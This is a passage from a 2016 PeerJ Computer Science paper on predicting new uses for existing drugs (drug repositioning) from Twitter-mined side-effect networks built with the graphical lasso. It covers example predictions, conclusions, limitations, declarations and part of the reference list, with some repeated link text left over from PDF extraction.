schizophrenia (Nicolson & Nemeroff, 2007). Ziprasidone is Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 13/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 4 Predicted repositioning of oxytocin (red) for the treatment of schizophrenia based on its proximity to the schizophrenia drug chlorpromazine (grey). Drugs in the graph are sized according to their degree (number of edges), while the thickness of a connecting edge is proportional to the partial correlation coefficient between the two drugs. The graph layout is performed by Cytoscape (Lopes et al., 2010) which applies a force-directed approach based on the partial correlation coefficient. Nodes are arranged so that edges are of more or less equal length and there are as few edge crossings as possible. For clarity, only the top ten drugs ranked by partial correlation coefficient are shown. the second-ranked drug by partial correlation coefficient; a number of other drugs used to treat mood disorders can also be located in the immediate vicinity including phenelzine, a non-selective and irreversible monoamine oxidase inhibitor (MAOI) used as an an- tidepressant and anxiolytic, milnacipran, a serotonin–norepinephrine reuptake inhibitor used to treat major depressive disorder, and tranylcypromine, another MAOI used as an antidepressant and anxiolytic agent. The co-location of these drugs in the same region of the graph suggests a degree of overlap in their respective mechanistic pathways, resulting in a high degree of similarity between their side-effect profiles. Nodes in this subgraph also have a relatively large degree indicating a tighter association than for other predictions, with common shared side-effects including dry mouth, sexual dysfunction, migraine, and orthostatic hypotension, while weight gain is shared between ramelteon and ziprasidone. Meloxicam Meloxicam, a nonsteroidal anti-inflammatory drug (NSAID) used to treat arthritis, is predicted to be a repositioning candidate for the treatment of non-Hodgkin lymphoma, via the mobilisation of autologous peripheral blood stem cells from bone marrow. By inhibiting cyclooxygenase 2, meloxicam is understood to inhibit generation of prostaglandin E2, which is known to stimulate osteoblasts to release osteopontin, a protein which encourages bone resorption by osteoclasts (Rainsford, Ying & Smith, 1997; Ogino et al., 2000). By inhibiting prostaglandin E2 and disrupting the production of osteopontin, meloxicam may encourage the departure of stem cells, which otherwise would be anchored Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 14/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 5 Predicted repositioning of ramelteon (red) for the treatment of bipolar I disorder based on its proximity to ziprasidone (grey). Along with ziprasidone, phenelzine, milnacipran and tranyl- cypromine are all used to treat mood disorders. to the bone marrow by osteopontin (Reinholt et al., 1990). In Fig. 6, rituximab, a B-cell depleting monoclonal antibody that is currently indicated for treatment of non-Hodgkin lymphoma, is the top ranked drug by partial correlation, which provides evidence for repositioning to this indication. Interestingly, depletion of B-cells by rituximab has recently been demonstrated to result in decreased bone resorption in patients with rheumatoid arthritis, possibly via a direct effect on both osteoblasts and osteoclasts (Wheater et al., 2011; Boumans et al., 2012), suggesting a common mechanism of action between meloxi- cam and rituximab. Further evidence is provided by the fifth-ranked drug clopidogrel, an antiplatelet agent used to inhibit blood clots in coronary artery disease, peripheral vascular disease, cerebrovascular disease, and to prevent myocardial infarction. Clopidogrel works by irreversibly inhibiting the adenosine diphosphate receptor P2Y12, which is known to increase osteoclast activity (BonekEY Watch, 2012). Similarly to the ramelteon subgraph, many drugs in the vicinity of meloxicam are used to treat inflammation including diclofenac, naproxen (both NSAIDs) and betamethasone, resulting in close association between these drugs, with shared side-effects in the subgraph including pain, cramping, flushing and fever, while swelling, indigestion, inflammation and skin rash are shared by meloxicam and rituximab. While the side-effects shared within the subgraphs of our three examples are commonly associated with a large number of drugs, some of the side-effects shared by the three drug pairs such as hallucinations, excessive salivation and anxiety are somewhat less common. To investigate this relationship for the data set as a whole, we calculated log frequencies Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 15/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 Figure 6 Predicted repositioning of meloxicam (red) for the treatment of non-Hodgkin lymphoma based on its proximity to rituximab (grey). for all side-effects and compared these values against the normalized average rank of pairs where the side-effect was shared by both the query and target drug. If we assume that a higher ranking in our model indicates a higher likelihood of drugs sharing a protein target, this relationship demonstrates similar properties to the observations of Campillos et al. (2008) in that there is a negative correlation between the rank and frequency of a side-effect. The correlation coefficient has a value of−0.045 which is significantly different from zero at the 0.001 level, although the linear relationship appears to break down where the frequency of the side-effect is lower than about 0.025. CONCLUSIONS In this study, we have used side-effect data mined from social media to generate a sparse graphical model, with nodes in the resulting graph representing drugs, and edges between them representing the similarity of their side-effect profiles. We demonstrated that known indications can be inferred based on the indications of neighbouring drugs in the network, with 42.41% of targets having their known indication identified amongst the top 5 ranked predictions, while 16.25% of drugs that are currently in a clinical trial have their proposed trial indication correctly identified. These results indicate that the volume and diversity of drug side-effects reported using social media is sufficient to be of use in side-effect-based drug repositioning, and this influence is likely to increase as the audience of platforms such as Twitter continues to see rapid growth. It may also help to address the problem of side-effect under-reporting. We also demonstrate that global statistical models such as the graphical lasso are well-suited to the analysis of large multivariate systems such as drug–drug networks. They offer significant advantages over conventional pairwise similarity methods by incorporating indirect relationships between all variables, while the use of the lasso penalty allows a sparse, parsimonious model to be generated with fewer spurious connections resulting in a simpler theory of relationships. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 16/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 While our method shows encouraging results, it is more likely to play a role in drug repositioning as a component in an integrated approach. Whether this is achieved by combining reported side-effects with those mined from resources such as SIDER, or by using predictions as the inputs to a supervised learning algorithm, a consensus approach is likely to achieve higher performance by incorporating a range of different data sources in addition to drug side-effects, while also compensating for the weaknesses of any single method (Emig et al., 2013). Limitations of our method largely stem from the underlying Twitter data (Plachouras, Leidner & Garrow, under review). Only a small fraction of daily tweets contain reports of drug side-effects, therefore restricting the number of drugs we are able to analyse. However, given that systems such as SoMeDoSEs are capable of continuously monitoring Twitter, the numbers of drugs and reported side-effects should steadily accumulate over time. To address this, in the future it may be possible to extend monitoring of social media to include additional platforms. For example, Weibo is a Chinese microblogging site akin to Twitter, with over 600 million users as of 2013. Clearly, tools will have to be adapted to deal with multilingual data processing or translation issues, while differences in cultural attitudes to sharing medical information may present further challenges. Extensions to the statistical approach may also result in improved performance. Methods such as the joint graphical lasso allow the generation of a graphical model using data with observations belonging to distinct classes (Danaher, Wang & Witten, 2014). For example, two covariances matrices generated using data from Twitter and SIDER could be combined in this way, resulting in a single model that best represents both sources. An extension to the graphical lasso also allows the decomposition of the sample covariance graph into smaller connected components via a thresholding approach (Mazumder & Hastie, 2012). This leads not only to large performance gains, but significantly increases the scalability of the graphical lasso approach. Another caveat to consider, common to many other repositioning strategies based on side-effect similarity, is that there is no evidence to suggest whether a repositioning candidate will be a better therapeutic than the drug from which the novel indication was inferred. While side-effects can provide useful information for inferring novel indications, they are in general undesirable and need to be balanced against any therapeutic benefits. Our model does not attempt to quantify efficacy or side-effect severity, but it might be possible to modify the natural language processing step during Twitter mining in order to capture comparative mentions of side-effects, since tweets discussing both the therapeutic and side-effects of two related drugs are not uncommon. Incorporating this information into our model may allow a more quantitative assessment of the trade-off between therapeutic and side-effects to be made as part of the prediction. ACKNOWLEDGEMENTS The authors would like to thank Lee Lancashire for reading an early draft and Andrew Garrow for help with Cortellis APIs. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 17/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46 ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was funded by Thomson Reuters Global Resources. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Thomson Reuters Global Resources. Competing Interests All authors are employees of Thomson Reuters. Author Contributions • Timothy Nugent conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Vassilis Plachouras and Jochen L. Leidner contributed reagents/materials/analysis tools, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The Cortellis Clinical Trials Intelligence IDs are provided in Table 1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/ 10.7717/peerj-cs.46#supplemental-information. REFERENCES Allen MP. 1997. Covariance and linear independence. In: Understanding regression analysis. New York: Springer, 31–35. Aronson JK. 2015. Meyer’s side effects of drugs. 16th edition. Amsterdam: Elsevier. Backstrom M, Mjorndal T, Dahlqvist R. 2004. Under-reporting of serious adverse drug reactions in Sweden. Pharmacoepidemiology and Drug Safety 13(7):483–487 DOI 10.1002/pds.962. Banerjee O, El Ghaoui L, D’Aspremont A. 2008. Model selection through sparse maximum likelihood estimation for multivariate Gaussian or binary data. The Journal of Machine Learning Research 9:485–516. Barabasi AL, Gulbahce N, Loscalzo J. 2011. Network medicine: a network-based approach to human disease. Nature Reviews Genetics 12(1):56–68 DOI 10.1038/nrg2918. Bento A, Gaulton A, Hersey A, Bellis LJ, Chambers J, Davies M, Krüger FA, Light Y, Mak L, McGlinchey S, Nowotka M, Papadatos G, Santos R, Overington JP. 2014. The ChEMBL Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 18/24 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.7717/peerj-cs.46#supplemental-information http://dx.doi.org/10.1002/pds.962 http://dx.doi.org/10.1038/nrg2918 http://dx.doi.org/10.7717/peerj-cs.46 bioactivity database: an update. Nucleic Acids Research 42(Database issue):D1083–D1090 DOI 10.1093/nar/gkt1031. Bisgin H, Liu Z, Kelly R, Fang H, Xu X, Tong W. 2012. Investigating drug repositioning opportunities in FDA drug labels through topic modeling. BMC Bioinformatics 13(Suppl 15):S6 DOI 10.1186/1471-2105-13-S15-S6. BonekEY Watch. 2012. P2RY12 and its role in osteoclast activity and bone remodeling. Bonekey Reports 1:232 DOI 10.1038/bonekey.2012.232. Boumans MJH, Thurlings RM, Yeo L, Scheel-Toellner D, Vos K, Gerlag DM, Tak PP. 2012. Rituximab abrogates joint destruction in rheumatoid arthritis by inhibiting osteoclastogenesis. Annals of the Rheumatic Diseases 71(1):108–113 DOI 10.1136/annrheumdis-2011-200198. Buse JB, Henry RR, Han J, Kim DD, Fineman MS, Baron AD. 2004. Effects of exenatide (exendin-4) on glycemic control over 30 weeks in sulfonylurea-treated patients with type 2 diabetes. Diabetes Care 27(11):2628–2635 DOI 10.2337/diacare.27.11.2628. Campillos M, Kuhn M, Gavin AC, Jensen LJ, Bork P. 2008. Drug target identification using side-effect similarity. Science 321(5886):263–266 DOI 10.1126/science.1158140. Chee BW, Berlin R, Schatz B. 2011. Predicting adverse drug events from personal health messages. AMIA Annual Symposium Proceedings 2011:217–226. Cheng F, Li W, Wu Z, Wang X, Zhang C, Li J, Liu G, Tang Y. 2013. Prediction of polypharmaco- logical profiles of drugs by the integration of chemical, side effect, and therapeutic space. Journal of Chemical Information and Modeling 53(4):753–762 DOI 10.1021/ci400010x. Danaher P, Wang P, Witten DM. 2014. The joint graphical lasso for inverse covariance estimation across multiple classes. Journal of the Royal Statistical Society: Series B (Statistical Methodology) 76(2):373–397 DOI 10.1111/rssb.12033. Dudley JT, Sirota M, Shenoy M, Pai RK, Roedder S, Chiang AP, Morgan AA, Sarwal MM, Pasricha PJ, Butte AJ. 2011. Computational repositioning of the anticonvulsant topiramate for inflammatory bowel disease. Science Translational Medicine 3(96):96ra76 DOI 10.1126/scitranslmed.3002648. Duran-Frigola M, Aloy P. 2012. Recycling side-effects into clinical markers for drug repositioning. Genome Medicine 4(1):3 DOI 10.1186/gm302. Emig D, Ivliev A, Pustovalova O, Lancashire L, Bureeva S, Nikolsky Y, Bessarabova M. 2013. Drug target prediction and repositioning using an integrated network-based approach. PLoS ONE 8(4):e60618 DOI 10.1371/journal.pone.0060618. Evans WE, McLeod HL. 2003. Pharmacogenomics–drug disposition, drug targets, and side effects. New England Journal of Medicine 348(6):538–549 DOI 10.1056/NEJMra020526. Feifel D. 2012. Oxytocin as a potential therapeutic target for schizophrenia and other neuropsy- chiatric conditions. Neuropsychopharmacology 37(1):304–305 DOI 10.1038/npp.2011.184. Feifel D, Macdonald K, Nguyen A, Cobb P, Warlan H, Galangue B, Minassian A, Becker O, Cooper J, Perry W, Lefebvre M, Gonzales J, Hadley A. 2010. Adjunctive intranasal oxytocin reduces symptoms in schizophrenia patients. Biological Psychiatry 68(7):678–680 DOI 10.1016/j.biopsych.2010.04.039. Feifel D, Reza T. 1999. Oxytocin modulates psychotomimetic-induced deficits in sensorimotor gating. Psychopharmacology 141(1):93–98 DOI 10.1007/s002130050811. Franke A, McGovern DPB, Barrett JC, Wang K, Radford-Smith GL, Ahmad T, Lees CW, Balschun T, Lee J, Roberts R, Anderson CA, Bis JC, Bumpstead S, Ellinghaus D, Festen EM, Georges M, Green T, Haritunians T, Jostins L, Latiano A, Mathew CG, Montgomery GW, Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 19/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/nar/gkt1031 http://dx.doi.org/10.1186/1471-2105-13-S15-S6 http://dx.doi.org/10.1038/bonekey.2012.232 http://dx.doi.org/10.1136/annrheumdis-2011-200198 http://dx.doi.org/10.2337/diacare.27.11.2628 http://dx.doi.org/10.1126/science.1158140 http://dx.doi.org/10.1021/ci400010x http://dx.doi.org/10.1111/rssb.12033 http://dx.doi.org/10.1126/scitranslmed.3002648 http://dx.doi.org/10.1186/gm302 http://dx.doi.org/10.1371/journal.pone.0060618 http://dx.doi.org/10.1056/NEJMra020526 http://dx.doi.org/10.1038/npp.2011.184 http://dx.doi.org/10.1016/j.biopsych.2010.04.039 http://dx.doi.org/10.1007/s002130050811 http://dx.doi.org/10.7717/peerj-cs.46 Prescott NJ, Raychaudhuri S, Rotter JI, Schumm P, Sharma Y, Simms LA, Taylor KD, Whiteman D, Wijmenga C, Baldassano RN, Barclay M, Bayless TM, Brand S, Büning C, Cohen A, Colombel J-F, Cottone M, Stronati L, Denson T, De Vos M, D’Inca R, Dubinsky M, Edwards C, Florin T, Franchimont D, Gearry R, Glas J, Van Gossum A, Guthery SL, Halfvarson J, Verspaget HW, Hugot J-P, Karban A, Laukens D, Lawrance I, Lemann M, Levine A, Libioulle C, Louis E, Mowat C, Newman W, Panés J, Phillips A, Proctor DD, Regueiro M, Russell R, Rutgeerts P, Sanderson J, Sans M, Seibold F, Steinhart AH, Stokkers PCF, Torkvist L, Kullak-Ublick G, Wilson D, Walters T, Targan SR, Brant SR, Rioux JD, D’Amato M, Weersma RK, Kugathasan S, Griffiths AM, Mansfield JC, Vermeire S, Duerr RH, Silverberg MS, Satsangi J, Schreiber S, Cho JH, Annese V, Hakonarson H, Daly MJ, Parkes M. 2010. Genome-wide meta-analysis increases to 71 the number of confirmed Crohn’s disease susceptibility loci. Nature Genetics 42(12):1118–1125 DOI 10.1038/ng.717. Freifeld CC, Brownstein JS, Menone CM, Bao W, Filice R, Kass-Hout T, Dasgupta N. 2014. Digital drug safety surveillance: monitoring pharmaceutical products in Twitter. Drug Safety 37(5):343–350 DOI 10.1007/s40264-014-0155-x. Friedman J, Hastie T, Tibshirani R. 2008. Sparse inverse covariance estimation with the graphical lasso. Biostatistics 9(3):432–441 DOI 10.1093/biostatistics/kxm045. Gaulton A, Bellis LJ, Bento AP, Chambers J, Davies M, Hersey A, Light Y, McGlinchey S, Michalovich D, Al-Lazikani B, Overington JP. 2012. ChEMBL: a large-scale bioactivity database for drug discovery. Nucleic Acids Research 40(Database issue):D1100–D1107 DOI 10.1093/nar/gkr777. Ghofrani HA, Osterloh IH, Grimminger F. 2006. Sildenafil: from angina to erectile dysfunction to pulmonary hypertension and beyond. Nature Reviews Drug Discovery 5(8):689–702 DOI 10.1038/nrd2030. Gimpl G, Wiegand V, Burger K, Fahrenholz F. 2002. Cholesterol and steroid hormones: modulators of oxytocin receptor function. Progress in Brain Research 139:43–55. Ginn R, Pimpalkhute P, Nikfarjam A, Pakti A, O’Connor K, Sarker A, Smith K, Gonzalez G. 2014. Mining Twitter for adverse drug reaction mentions: a corpus and classification benchmark. In: Proceedings of the 4th workshop on building and evaluating resources for health and biomedical text processing, 1–8. Hastie T, Tibshirani R, Wainwright M. 2015. Statistical learning with sparsity: the lasso and generalizations. Boca Raton: CRC Press. Hazell L, Shakir SA. 2006. Under-reporting of adverse drug reactions: a systematic review. Drug Safety 29(5):385–396 DOI 10.2165/00002018-200629050-00003. Hu G, Agarwal P. 2009. Human disease-drug network based on genomic expression profiles. PLoS ONE 4(8):e6536 DOI 10.1371/journal.pone.0006536. Hurle MR, Yang L, Xie Q, Rajpal DK, Sanseau P, Agarwal P. 2013. Computational drug repositioning: from data to therapeutics. Clinical Pharmacology and Therapeutics 93(4):335–341 DOI 10.1038/clpt.2013.1. Internet Live Stats. 2015. Twitter usage statistics. Available at http://www.internetlivestats.com/ twitter-statistics/ (accessed 30 April 2015). Iorio F, Bosotti R, Scacheri E, Belcastro V, Mithbaokar P, Ferriero R, Murino L, Tagliaferri R, Brunetti-Pierri N, Isacchi A, Di Bernardo D. 2010. Discovery of drug mode of action and drug repositioning from transcriptional responses. Proceedings of the National Academy of Sciences of the United States of America 107(33):14621–14626 DOI 10.1073/pnas.1000138107. Jarvis L. 2006. Teaching an old drug new tricks. Chemical and Engineering News 84(7):54–55. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 20/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1038/ng.717 http://dx.doi.org/10.1007/s40264-014-0155-x http://dx.doi.org/10.1093/biostatistics/kxm045 http://dx.doi.org/10.1093/nar/gkr777 http://dx.doi.org/10.1038/nrd2030 http://dx.doi.org/10.2165/00002018-200629050-00003 http://dx.doi.org/10.1371/journal.pone.0006536 http://dx.doi.org/10.1038/clpt.2013.1 http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://www.internetlivestats.com/twitter-statistics/ http://dx.doi.org/10.1073/pnas.1000138107 http://dx.doi.org/10.7717/peerj-cs.46 Jones N. 2009. Too few women in clinical trials? Nature Epub ahead of print Jun 8 2009 DOI 10.1038/news.2009.549. Jones DT, Buchan DW, Cozzetto D, Pontil M. 2012. PSICOV: precise structural contact prediction using sparse inverse covariance estimation on large multiple sequence alignments. Bioinformatics 28(2):184–190 DOI 10.1093/bioinformatics/btr638. Jung SH, Park J-M, Moon E, Chung YI, Lee BD, Lee YM, Kim JH, Kim SY, Jeong HJ. 2014. Delay in the recovery of normal sleep-wake cycle after disruption of the light-dark cycle in mice: a bipolar disorder-prone animal model? Psychiatry Investigation 11(4):487–491 DOI 10.4306/pi.2014.11.4.487. Karimi S, Wang C, Metke-Jimenez A, Gaire R, Paris C. 2015. Text and data mining techniques in adverse drug reaction detection. ACM Computing Surveys 47(4): 56:1–56:39 DOI 10.1145/2719920. Kohler S, Bauer S, Horn D, Robinson PN. 2008. Walking the interactome for prioritization of candidate disease genes. American Journal of Human Genetics 82(4):949–958 DOI 10.1016/j.ajhg.2008.02.013. Kovács IA, Mizsei R, Csermely P. 2014. A unified data representation theory for network visualization, ordering and coarse-graining. ArXiv: Article 1409.8420. Krauthammer M, Kaufmann CA, Gilliam TC, Rzhetsky A. 2004. Molecular triangulation: bridging linkage and molecular-network information for identifying candidate genes in Alzheimer’s disease. Proceedings of the National Academy of Sciences of the United States of America 101(42):15148–15153 DOI 10.1073/pnas.0404315101. Kuhn M, Campillos M, Letunic I, Jensen LJ, Bork P. 2010. A side effect resource to capture phenotypic effects of drugs. Molecular Systems Biology 6:343 DOI 10.1038/msb.2009.98. Ladenheim EE. 2015. Liraglutide and obesity: a review of the data so far. Drug Design, Development and Therapy 9:1867–1875 DOI 10.2147/DDDT.S58459. Lamb J, Crawford ED, Peck D, Modell JW, Blat IC, Wrobel MJ, Lerner J, Brunet JP, Subramanian A, Ross KN, Reich M, Hieronymus H, Wei G, Armstrong SA, Haggarty SJ, Clemons PA, Wei R, Carr SA, Lander ES, Golub TR. 2006. The connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. Science 313(5795):1929–1935 DOI 10.1126/science.1132939. Leaman R, Wojtulewicz L, Sullivan R, Skariah A, Yang J, Gonzalez G. 2010. Towards internet-age pharmacovigilance: extracting adverse drug reactions from user posts to health-related social networks. In: Proceedings of the 2010 workshop on biomedical natural language processing. BioNLP ’10. Stroudsburg: Association for Computational Linguistics, 117–125. Available at http://dl.acm.org/citation.cfm?id=1869961.1869976. Ledoit O, Wolf M. 2003. Honey, I shrunk the sample covariance matrix. In: UPF economics and business working paper. 691. Lee PR, Brady DL, Shapiro RA, Dorsa DM, Koenig JI. 2005. Social interaction deficits caused by chronic phencyclidine administration are reversed by oxytocin. Neuropsychopharmacology 30(10):1883–1894 DOI 10.1038/sj.npp.1300722. Li M, Marubayashi A, Nakaya Y, Fukui K, Arase S. 2001. Minoxidil-induced hair growth is mediated by adenosine in cultured dermal papilla cells: possible involvement of sulfonylurea receptor 2B as a target of minoxidil. Journal of Investigative Dermatology 117(6):1594–1600 DOI 10.1046/j.0022-202x.2001.01608.x. Nugent et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.46 21/24 https://peerj.com/computer-science/ http://dx.doi.org/10.1038/news.2009.549 http://dx.doi.org/10.1093/bioinformatics/btr638 http://dx.doi.org/10.4306/pi.2014.11.4.487 http://dx.doi.org/10.1145/2719920 http://dx.doi.org/10.1016/j.ajhg.2008.02.013 http://dx.doi.org/10.1073/pnas.0404315101 http://dx.doi.org/10.1038/msb.2009.98 http://dx.doi.org/10.2147/DDDT.S58459 http://dx.doi.org/10.1126/science.1132939 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dl.acm.org/citation.cfm?id=1869961.1869976 http://dx.doi.org/10.1038/sj.npp.1300722 http://dx.doi.org/10.1046/j.0022-202x.2001.01608.x http://dx.doi.org/10.7717/peerj-cs.46 Lopes CT, Franz M, Kazi F, Donaldson SL, Morris Q, Bader GD. 2010. Cytoscape Web: an interactive web-based network browser. Bioinformatics 26(18):2347–2348 DOI 10.1093/bioinformatics/btq430. Lopez-Gonzalez E, Herdeiro MT, Figueiras A. 2009. Determinants of under-reporting of adverse drug reactions: a systematic review. Drug Safety 32(1):19–31 DOI 10.2165/00002018- 200932010-00002. Mazumder R, Hastie T. 2012. Exact covariance thresholding into connected components for large-scale graphical lasso. Journal of Machine Learning Research 13:781–794. Meinshausen N, Bühlmann P. 2006. High-dimensional graphs and variable selection with the lasso. In: The annals of statistics. Beachwood: Institute of Mathematical Statistics, 1436–1462. Mikolov T, Chen K, Corrado G, Dean J. 2013. Efficient estimation of word representations in vector space. ArXiv preprint. arXiv:1301.3781. 